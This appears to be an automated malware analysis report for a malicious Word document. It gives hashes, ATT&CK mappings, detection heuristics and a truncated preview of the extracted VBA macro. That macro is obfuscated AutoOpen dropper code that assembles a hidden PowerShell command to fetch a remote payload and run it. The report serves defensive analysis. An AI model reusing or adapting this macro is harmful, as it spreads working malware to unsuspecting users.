Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8cc7c6b9b105946a…

MALICIOUS

Office (OLE)

267.5 KB Created: 2018-03-01 18:39:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 499ad0292f66c75078877495de93fd22 SHA-1: 5a12b673a00d7c19eca13822ab1eb1b74a5b40a8 SHA-256: 8cc7c6b9b105946a54965a697d3292ac9648bdbe046f70f159222efe81e7277c
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call to execute a command, likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6467498-0' further supports its dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6467498-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6467498-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5828 bytes
SHA-256: 1e5c4c1d5fdda89be2faa10795a99c941edabe2aeb386746ff232e2be2e88555
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bet"
Sub AutoOpen()
    Dim HM_SI As String
    EQ_QH = Array("i", "l", "c", "h", "e", "u", "d", "p", "a", "y", " ", "w", "s", "-", "r", "t", "n", "o", "x", "b")
    Dim EK_PI As String
    EK_PI = "ZgB1AG4AYwB0AGkAbwBuACAAY"
    HM_SI = HM_SI + EQ_QH(7)
    HM_SI = HM_SI + EQ_QH(17)
    Dim FS_KI As String
    FS_KI = "QAoACQAeAApAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQ"
    HM_SI = HM_SI + EQ_QH(11)
    HM_SI = HM_SI + EQ_QH(4)
    Dim BS_KB As String
    BS_KB = "AZQBtAC4AVABlAH"
    HM_SI = HM_SI + EQ_QH(14)
    HM_SI = HM_SI + EQ_QH(12)
    Dim DT_NC As String
    DT_NC = "gAdAAuAEUAbgBjAG8AZAB"
    HM_SI = HM_SI + EQ_QH(3)
    HM_SI = HM_SI + EQ_QH(4)
    Dim IS_PJ As String
    IS_PJ = "pAG4AZw"
    BL_QE = BL_QE & EK_PI & FS_KI & BS_KB & DT_NC & IS_PJ
    HM_SI = HM_SI + EQ_QH(1)
    HM_SI = HM_SI + EQ_QH(1)
    Dim JP_LH As String
    JP_LH = "BdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIA"
    HM_SI = HM_SI + EQ_QH(10)
    HM_SI = HM_SI + EQ_QH(13)
    Dim BS_RH As String
    BS_RH = "aQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdA"
    HM_SI = HM_SI + EQ_QH(11)
    HM_SI = HM_SI + EQ_QH(0)
    Dim DP_TJ As String
    DP_TJ = "BdADoAOgBGAHI"
    HM_SI = HM_SI + EQ_QH(16)
    HM_SI = HM_SI + EQ_QH(6)
    Dim JT_SH As String
    JT_SH = "AbwBtAEIAYQBzAGUANgA0AFMAdAByA"
    HM_SI = HM_SI + EQ_QH(17)
    HM_SI = HM_SI + EQ_QH(11)
    Dim IN_TA As String
    IN_TA = "GkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkAC"
    BL_QE = BL_QE & JP_LH & BS_RH & DP_TJ & JT_SH & IN_TA
    HM_SI = HM_SI + EQ_QH(12)
    HM_SI = HM_SI + EQ_QH(15)
    Dim BT_NC As String
    BT_NC = "gAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8AawBlAC0AdwBl"
    HM_SI = HM_SI + EQ_QH(9)
    HM_SI = HM_SI + EQ_QH(1)
    Dim IQ_KC As String
    IQ_KC = "AGIAcgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcA"
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(10)
    Dim HN_RB As String
    HN_RB = "BzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMAZQBuAHQAcgB"
    HM_SI = HM_SI + EQ_QH(3)
    HM_SI = HM_SI + EQ_QH(0)
    Dim BQ_NE As String
    BQ_NE = "hAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4AdwBpAG"
    HM_SI = HM_SI + EQ_QH(6)
    HM_SI = HM_SI + EQ_QH(6)
    Dim JK_KG As String
    JK_KG = "4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoA"
    BL_QE = BL_QE & BT_NC & IQ_KC & HN_RB & BQ_NE & JK_KG
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(16)
    Dim DT_KI As String
    DT_KI = "G8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AU"
    HM_SI = HM_SI + EQ_QH(10)
    HM_SI = HM_SI + EQ_QH(13)
    Dim JT_OH As String
    JT_OH = "ABhAHIAdABpAHQAaQBvAG4ASwB"
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(18)
    Dim GO_QD As String
    GO_QD = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAG"
    HM_SI = HM_SI + EQ_QH(4)
    HM_SI = HM_SI + EQ_QH(2)
    Dim CQ_LA As String
    CQ_LA = "cAZQAlADIANwAmACQAUwBlAG"
    HM_SI = HM_SI + EQ_QH(5)
    HM_SI = HM_SI + EQ_QH(15)
    Dim CL_OB As String
    CL_OB = "wAZQBjAHQAPQB"
    BL_QE = BL_QE & DT_KI & JT_OH & GO_QD & CQ_LA & CL_OB
    HM_SI = HM_SI + EQ_QH(0)
    HM_SI = HM_SI + EQ_QH(17)
    Dim BN_OB As String
    BN_OB = "kAGEAdABhACYAcwB2AD0AMgAwADEANwAt"
    HM_SI = HM_SI + EQ_QH(16)
    HM_SI = HM_SI + EQ_QH(7)
    Dim BQ_NJ As String
    BQ_NJ = "ADAANAAtADEANwAmAHMAcwA9AGIAZgBx"
    HM_SI = HM_SI + EQ_QH(17)
    HM_SI = HM_SI + EQ_QH(1)
    Dim BO_OJ As String
    BO_OJ = "AHQAJgBzAHIAdAA9AH"
    HM_SI = HM_SI + EQ_QH(0)
    HM_SI = HM_SI + EQ_QH(2)
    Dim BM_TC As String
    BM_TC = "MAYwBvACYAcwBwAD0AcgB3AGQAbABhAG"
    HM_SI = HM_SI + EQ_QH(9)
    HM_SI = HM_SI + EQ_QH(10)
    Dim GL_PD As String
    GL_PD = "MAdQBwACYAcwBlAD0AMgAwADEANwAtADEA"
    BL_QE = BL_QE & BN_OB & BQ_NJ & BO_OJ & BM_TC & GL_PD
    HM_SI = HM_SI + EQ_QH(19)
    HM_SI = HM_SI 
... (truncated)